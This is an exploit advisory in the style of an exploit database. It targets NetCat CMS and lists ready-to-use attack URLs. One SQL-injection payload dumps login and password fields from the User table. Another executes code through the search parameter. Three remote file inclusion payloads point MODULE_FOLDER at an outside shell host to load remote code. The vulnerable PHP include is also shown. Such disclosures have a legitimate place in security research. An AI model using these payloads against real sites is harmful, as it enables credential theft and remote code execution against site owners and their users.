# Exploit Title: NetCat CMS Code exec, SQL-injection
# Google Dork: none
# Date: 28.11.2010
# Author: brain[pillow]
# Software Link: http://netcat.ru/
# Version: UNKNOWN
On different versions of this software next vulnerabilities are availible:
=======================================================
# Sql-injection:
/search/?action=index&text=q')+union+select+1,1,concat_ws(0x3a,login,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+User%23
=======================================================
# Code exec:
/search/?action=index&text={${phpinfo()}}
# Remote File Inclusion:
=================================
# Vuln code example:
=================================
<?php
/* $Id: function.inc.php 3272 2009-05-25 14:34:42Z vadim $ */
// get global value (for admin mode)
global $MODULE_FOLDER;
// include need classes
include_once ($MODULE_FOLDER."filemanager/nc_filemanager.class.php");
?>
================================
# Three exploits:
================================
/netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://shell?
/netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://shell?
/netcat/modules/logging/function.inc.php?MODULE_FOLDER=http://shell?